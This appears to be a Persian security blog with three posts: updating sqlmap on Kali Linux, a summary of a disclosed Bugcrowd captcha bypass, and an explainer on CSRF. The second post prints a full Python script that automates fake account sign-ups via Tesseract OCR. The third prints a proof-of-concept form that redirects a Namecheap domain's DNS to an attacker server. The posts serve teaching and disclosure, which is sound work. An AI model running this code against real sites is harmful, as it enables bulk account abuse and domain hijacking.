مشکل آپدیت sqlmap در لینوکس کالی

من برای تست نفوذ معمولا از لینوکس کالی استفاده می کنم و یکی از ابزارهای پرکاربردم هم sqlmap است. یک مشکل در کالی وجود داره و اون هم اینکه مخازن کالی نسبت به بعضی نرم افزارها قدیمی تره. بد ندیدم یه راه حل برای مشکل آپدیت sqlmap در لینوکس کالیاینجا بذارم برای استفاده خودم و دیگران.

توسعه دهنده های کالی ۳ راه رو برای مشکل آپدیت نرم افزارهایی که زود به زود به روز می شن پیشنهاد دادن. راه حلاشون حذف فولدر نرم افزار و ایجاد دوباره اون از طریق دستور git، نصب دوباره نرم افزار در یک فولدر موقت با دستور git و یا استفاده از مخازن bleeding edge.

اضافه کردن مخازن bleeding edge رو انجام دادم و در مورد خیلی از ابزارها جواب می ده اما در مورد sqlmap همچنان این مخزن قدیمی تره. برای اضافه کردن مخزن می تونید از دستور زیر استفاده کنید:

echo deb http://repo.kali.org/kali kali-bleeding-edge main >> /etc/apt/sources.list
apt-get update
apt-get upgrade

echo deb http://repo.kali.org/kali kali-bleeding-edge main >> /etc/apt/sources.list

apt-get update

apt-get upgrade

اما حل مشکل sqlmap. به جای اینکه نرمافزار رو حذف کنیم و یا به صورت موقت جای دیگه نصبش کنیم، فولدر کنونی رو متصل می کنیم به github و اون رو به روز می کنیم. عملا یه چیزی شبیه دو راه دیگه است.

ابتدا به فولدر sqlmap می ریم:

cd /usr/share/sqlmap

1	cd /usr/share/sqlmap

بعد اون فولدر رو به عنوان مخزن معرفی می کنیم:

git init

git init

و متصلش می کنیم به مخزن sqlmap در github

git remote add origin https://github.com/sqlmapproject/sqlmap.git

1	git remote add origin https://github.com/sqlmapproject/sqlmap.git

و در نهایت sqlmap رو بدون مشکل آپدیت می کنیم:

sqlmap --update

1	sqlmap --update

نکته: این کار توسط توسعه دهنده های کالی توصیه نمی شه اما به روز بودن ابزار برای من بیشتر ارزش داره. شما خودتون تصمیم بگیرید. 🙂

امنیت, برنامه‌نویسی

دور زدن کپچا

این پست در مورد اسکریپتی است که برای دور زدن کپچا در بخش نام نویسی سایت bugcrowd نوشته شده. خود سایت پس از رفع مشکل، پستی گذاشته و با تحسین کار Pwndizzle که این باگ رو معرفی کرده، نحوه نوشتن اسکریپت و کارکردش رو معرفی کرده. من در اینجا به صورت خلاصه این گزارش رو منتقل می کنم.

با اعلام سایت bugcrowd برای اهدای جایزه به کسانی که باگ های سایت رو معرفی کنند، Pwndizzle یه بررسی انجام می ده و متوجه می شه که در بخش ثبت نام، تغییر پسورد و یا پس از وارد کردن پسورد اشتباه، کاربران با یک کپچا روبه رو می شن که خیلی پیچیده نیست. به این فکر می افته که کدی برای دور زدن کپچا بنویسه و بتونه به صورت انبوه در سایت ثبت نام کنه. کد به زبان پایتون نوشته شده و از نرم افزارهای جانبی هم استفاده شده.

دور زدن کپچا

اگر اسکریپت رو یک تازه ککار نوشته باشه ممکنه مشکلات امنیتی داشته باشه و نفوذ کننده بتونه کد رو در متن صفحه ببینه و یا از یک کپچا چندبار استفاده کنه. اگر برنامه نویس کارش رو بلد باشه و کد امنتری نوشته باشه هم راه کارهایی وجود داره. می شه برون سپاری کرد و پول داد تا یه سری آدم کپچا رو وارد کنن و یا از یک تشخیص دهنده کاراکتر از روی تصویر OCR استفاده کرد.

ما می خوایم خودمون یه برنامه بنویسیم پس می ریم سراغ OCR. برای تشخیص کاراکترهای تصویری برنامه های مختلفی وجود داره که با آنالیز تصویر، لیست کاراکترهای احتمالی رو بهمون می دن. Pwndizzle از Tesseract استفاده کرده چونکه خروجی های بهتری داره.

کاری که انجام خواهد شد اینه که تصویر کپچا از سایت گرفته بشه، بزرگت تر بشه و به Tesseract داده بشه برای بررسی و تشخیص کاراکترها. در صورتیکه با کپچای پیچیده تری رو به رو باشیم که از خط و لکه برای ناخوانا کردن استفاده شده باشه، باید پیش از ارسال تصویر به Tesseract، اون رو تمیز کنیم.

پروسه ثبت نام دو مرحله داره:

بازکردن صفحه ثبت نام و دریافت فرم که شامل تصویر کپچا و کد جلوگیری از CSRF است
ارسال اطلاعات ثبت نام (نام کربری، پسورد و غیره) و نوشته تشخیص داده شده در تصویر

برای اینکه اسکریپت کار کنه باید ابتدا صفحه ثبت نام رو دانلود کنه، توکن (نشانه) کپچا و جلوگیری از CSRF رو پیدا کنه، تصویر کپچا رو دانلود کنه، بزرگش کنه و بده به Tesseract.

نمونه ای از پارامترهای دریافتی در صفحه ثبت نام رو در تصویر زیر می بینید:

کدی که برای مراحل بالا گفته شد با پایتون نسخه ۳.۳ نوشته شد:

# A script to bypass the Bugcrowd sign-up page captcha
 # Created by @pwndizzle - http://pwndizzle.blogspot.com

 from PIL import Image
 from urllib.error import *
 from urllib.request import *
 from urllib.parse import *
 import re
 import subprocess

 def getpage():
     try:
         print("[+] Downloading Page");
         site = urlopen("https://portal.bugcrowd.com/user/sign_up")
         site_html = site.read().decode("utf-8")
         global csrf
         #Parse page for CSRF token (string 43 characters long ending with =)
         csrf = re.findall('[a-zA-Z0-9+/]{43}=', site_html)
         print ("-----CSRF Token: " + csrf[0])
         global ctoken
         #Parse page for captcha token (string 40 characters long)
         ctoken = re.findall('[a-z0-9]{40}', site_html)
         print ("-----Captcha Token: " + ctoken[0])
     except URLError as e:
         print ("*****Error: Cannot retrieve URL*****");

 def getcaptcha():
     try:
         print("[+] Downloading Captcha");
         captchaurl = "https://portal.bugcrowd.com/simple_captcha?code="+ctoken[0]
         urlretrieve(captchaurl,'captcha1.png')
     except URLError as e:
         print ("*****Error: Cannot retrieve URL*****");

 def resizer():
 print("[+] Resizing...");
 im1 = Image.open("captcha1.png")
 width, height = im1.size
 im2 = im1.resize((int(width*5), int(height*5)), Image.BICUBIC)
 im2.save("captcha2.png")

 def tesseract():
     try:
         print("[+] Running Tesseract...");
         #Run Tesseract, -psm 8, tells Tesseract we are looking for a single word
         subprocess.call(['C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe', 'C:\\Python33\\captcha2.png', 'output', '-psm', '8'])
         f = open ("C:\Python33\output.txt","r")
         global cvalue
 #Remove whitespace and newlines from Tesseract output
         cvaluelines = f.read().replace(" ", "").split('\n')
         cvalue = cvaluelines[0]
         print("-----Captcha: " + cvalue);
     except Exception as e:
         print ("Error: " + str(e))

 def send():
     try:
         print("[+] Sending request...");
         user = "testuser99"
         params = {'utf8':'%E2%9C%93', 'authenticity_token': csrf[0], 'user[username]':user, 'user[email]':user+'@test.com', 'user[password]':'password123', 'user[password_confirmation]':'password123', 'captcha':cvalue,'captcha_key':ctoken[0],'agree_terms_conditions':'true'}
         data = urlencode(params).encode('utf-8')
         request = Request("https://portal.bugcrowd.com/user")
         #Send request and analyse response
         f = urlopen(request, data)
         response = f.read().decode('utf-8')
 #Check for error message
         fail = re.search('The following errors occurred', response)
         if fail:
             print("-----Account creation failed!")
         else:
             print ("-----Account created!")
     except Exception as e:
         print ("Error: " + str(e))

 print("[+] Start!");
 #Download page and parse data
 getpage();
 #Download captcha image
 getcaptcha();
 #Resize captcha image
 resizer();
 #Need more filtering? Add subroutines here!
 #Use Tesseract to analyse captcha image
 tesseract();
 #Send request to site containing form data and captcha
 send();
 print("[+] Finished!");

# A script to bypass the Bugcrowd sign-up page captcha

# Created by @pwndizzle - http://pwndizzle.blogspot.com

from PIL import Image

from urllib.error import *

from urllib.request import *

from urllib.parse import *

import re

import subprocess

def getpage():

try:

print("[+] Downloading Page");

site = urlopen("https://portal.bugcrowd.com/user/sign_up")

site_html = site.read().decode("utf-8")

global csrf

#Parse page for CSRF token (string 43 characters long ending with =)

csrf = re.findall('[a-zA-Z0-9+/]{43}=', site_html)

print ("-----CSRF Token: " + csrf[0])

global ctoken

#Parse page for captcha token (string 40 characters long)

ctoken = re.findall('[a-z0-9]{40}', site_html)

print ("-----Captcha Token: " + ctoken[0])

except URLError as e:

print ("*****Error: Cannot retrieve URL*****");

def getcaptcha():

try:

print("[+] Downloading Captcha");

captchaurl = "https://portal.bugcrowd.com/simple_captcha?code="+ctoken[0]

urlretrieve(captchaurl,'captcha1.png')

except URLError as e:

print ("*****Error: Cannot retrieve URL*****");

def resizer():

print("[+] Resizing...");

im1 = Image.open("captcha1.png")

width, height = im1.size

im2 = im1.resize((int(width*5), int(height*5)), Image.BICUBIC)

im2.save("captcha2.png")

def tesseract():

try:

print("[+] Running Tesseract...");

#Run Tesseract, -psm 8, tells Tesseract we are looking for a single word

subprocess.call(['C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe', 'C:\\Python33\\captcha2.png', 'output', '-psm', '8'])

f = open ("C:\Python33\output.txt","r")

global cvalue

#Remove whitespace and newlines from Tesseract output

cvaluelines = f.read().replace(" ", "").split('\n')

cvalue = cvaluelines[0]

print("-----Captcha: " + cvalue);

except Exception as e:

print ("Error: " + str(e))

def send():

try:

print("[+] Sending request...");

user = "testuser99"

params = {'utf8':'%E2%9C%93', 'authenticity_token': csrf[0], 'user[username]':user, 'user[email]':user+'@test.com', 'user[password]':'password123', 'user[password_confirmation]':'password123', 'captcha':cvalue,'captcha_key':ctoken[0],'agree_terms_conditions':'true'}

data = urlencode(params).encode('utf-8')

request = Request("https://portal.bugcrowd.com/user")

#Send request and analyse response

f = urlopen(request, data)

response = f.read().decode('utf-8')

#Check for error message

fail = re.search('The following errors occurred', response)

if fail:

print("-----Account creation failed!")

else:

print ("-----Account created!")

except Exception as e:

print ("Error: " + str(e))

print("[+] Start!");

#Download page and parse data

getpage();

#Download captcha image

getcaptcha();

#Resize captcha image

resizer();

#Need more filtering? Add subroutines here!

#Use Tesseract to analyse captcha image

tesseract();

#Send request to site containing form data and captcha

send();

print("[+] Finished!");

در اجرای آزمایشی، کپچای زیر نشان داده شد:

و خروجی اسکریپت هم به صورت زیر شد:

می بینیم که کد با موفقیت اجرا شد. حالا می تونیم با قرار دادن مراحل گفته شد در یک دور، به هر تعداد که بخواهیم کاربر در سایت ایجاد کنیم. این روش محدودیت هایی داره. برای مثال:

Tesseract در عمل تنها ۳۰ درصد موارد کپچا رو درست تشخیص می داده
سایت های دیگه ممکنه از کپچاهای پیچیده تری استفاده بکنند که درصد موفقیت رو پایین بیاره
محدودیت ثبت نام روزانه برای هر IP نیز می تونه وجود داشته باشه

این نمونه می تونه دلیلی باشه برای توصیه کردن به برنامه نویس ها برای انجام کارهای تخصصی و اختراع نکردن دوباره چرخ. همچنین استفاده بی جا و زیاد از کپچا می تونه تجربه کاربری بدی رو ایجاد بکنه و در عمل نکته منفی برای سایتمون به حساب بیاد.

امنیت

ضعف امنیتی جعل درخواست

ضعف امنیتی جعل درخواست یا Cross-Site Request Forgery (CSRF) ناشی از عدم بررسی صحیح ارسال کننده درخواست و اجرای درخواست های بدون اعتباره.

این ضعف معمولا منجر می شه به اجرای عملیات ناخواسته از طرف کاربر یا ادمین سایت. هکر با به کار بردن مهندسی اجتماعی (برای مثال تشویق کاربر یا ادمین به باز کردن یک لینک) دستوراتی رو از طرف اونها برای اجرا به سایت می فرسته. دامنه اثرات این درخواست ها می تونه از لو رفتن اطلاعات کاربری، تغییر پسوردها، حذف اطلاعات و کاربرها تا از دست دادن کنترل کامل سایت باشه.

روش های زیادی برای جلوگیری از این ضعف پیشنهاد می شه که بعضی هاش عملا کاربردی نداره. برای مثال گفته می شه درخواست ها رو در قالب شیوه POST ارسال کنید. این روش به راحتی قابل دور زدنه. کافیه که هکر قربانی رو فریب بده که یه فرم رو submit کنه و یا حتی کافیه که جاوا اسکریپت روی مرورگر قربانی فعال باشه و بدون اینکه حتی متوجه بشه یه فرم hidden در سایت هکر، با کمک جاوا اسکریپت ارسال بشه.

شمایی از یک حمله CSRF

برای نمونه می تونیم نمونه زیر رو ببینیم. این مشکل ۶ ماه پیش کشف شده به مدیران سایت گذارش شده، اما بعد از گذشت مدت زیادی، ضعف رو برطرف کردند.

یک کارشناس امنیتی نشون داده سایت Namecheap که یکی از ثبت کننده های معروف دامنه است، در بخش تعیین DNS ضعف CSRF رو داشته.

اثبات:

<html>
  <body>
    <form action="https://manage.www.namecheap.com/myaccount/modsingle.asp?domain=targetdomain.org&type=dns" method="POST">
      <input type="hidden" name="NSOption" value="custom" />
      <input type="hidden" name="customdnstype" value="customdns" />
      <input type="hidden" name="NS1" value="ns1.evildns.org" />
      <input type="hidden" name="NS2" value="ns2.evildns.org" />
      <input type="hidden" name="NS3" value="" />
      <input type="hidden" name="NS4" value="" />
      <input type="hidden" name="NS5" value="" />
      <input type="hidden" name="NS6" value="" />
      <input type="hidden" name="NS7" value="" />
      <input type="hidden" name="NS8" value="" />
      <input type="hidden" name="NS9" value="" />
      <input type="hidden" name="NS10" value="" />
      <input type="hidden" name="NS11" value="" />
      <input type="hidden" name="NS12" value="" />
      <input type="hidden" name="NSSUBMIT" value="Save&#32;Changes" />
      <input type="hidden" name="NS&#46;x" value="NS" />
      <input type="hidden" name="Domain" value="targetdomain&#46;org" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>

<body>

</form>

</body>

</html>

کد بالا در واقع یک فرم HTML است که یک سری درخواست رو با روش POST به آدرس زیر ارسال می کنه:

https://manage.www.namecheap.com/myaccount/modsingle.asp?domain=targetdomain.org&type=dns

1	https://manage.www.namecheap.com/myaccount/modsingle.asp?domain=targetdomain.org&type=dns

در متغیرهای ارسالی، targetdomain.org آدرس سایتی است که قراره هک بشه و ns1.evildns.org و ns2.evildns.org آدرس DNS سروری است که در اختیار هکره.

در صورتیکه ادمین سایت Namecheap فریب بخوره و لینک صفحه ای رو که شامل فرم بالاست باز کنه، بدون اینکه متوجه بشه DNS سایت قربانی رو تغییر داده. تغییر DNS می تونه منجر بشه به نمایش هر محتوایی که هکر بخواد به جای محتوای سایت اصلی. هکر می تونه با این کار و انتقال بازدید کننده ها به سروری که بدافزار توزیع می کنه، کامپیوترهای زیادی رو آلوده کنه. می تونه با تغییر DNS و نمایش یک صفحه “تغییر چهره” یک پیغام سیاسی رو نمایش بده، کاری که در مورد برخی دامنه های محلی گوگل چند وقت پیش افتاد. هکر حتی می تونه با تغییر DNS سرور دریافت ایمیل های کاربران یک سایت رو تغییر بده و به همه ایمیل های اونها دسترسی داشته باشه.

ضعف امنیتی CSRF در کنار ضعف امنیتی دیگه ای به نام XSS، که منجر به اجرای کدهای جاوا اسکریپت ناخواسته می شه، ترکیب بسیار خطرناکی رو تشکیل می دهند که می تونه سایت های بزرگی رو به زانو در بیاره.

در این لینک می تونید روش های کاربردی جلوگیری از CSRF رو ببینید. باید دقت کنیم که هر کدوم از این روش ها نقطه های ضعف و قوت خودشون رو دارند.

برای مثال اجبار کاربر به پر کردن کپچا در هر درخواست می تونه اذیت کننده باشه و تجربه کاربری ناخوشایند و در نتیجه کم شدن استفاده رو در پی داشته باشه. یا چک کردن سایت ارجاع دهنده در صورتیکه هک ترکیبی از CSRF و XSS باشه عملا از کار می افته.

همچنین پیشنهادهایی برای کاربرها و مخصوصا ادمین ها وجود داره:

هنگام خروج از محیط کاربری سایت، Loq Out کنید.
اجازه ذخیره شدن نام کاربری و پسورد رو به مرورگر ندید و از گزینه “یادآوری” در زمان ورود به سایت استفاده نکنید.
از مرورگرهای جداگانه برای ورود به سایت های حساس و وبگردی استفاده کنید.
با استفاده از افزونه های مثل No-Script اجرای کدهای جاوا اسکریپت رو روی مرورگرتون محدود کنید.
در مرورگری که برای کارهای حساس استفاده می کنید ایمیل ها رو به صورت “متن ساده” بخوانید و html رو غیرفعال کنید.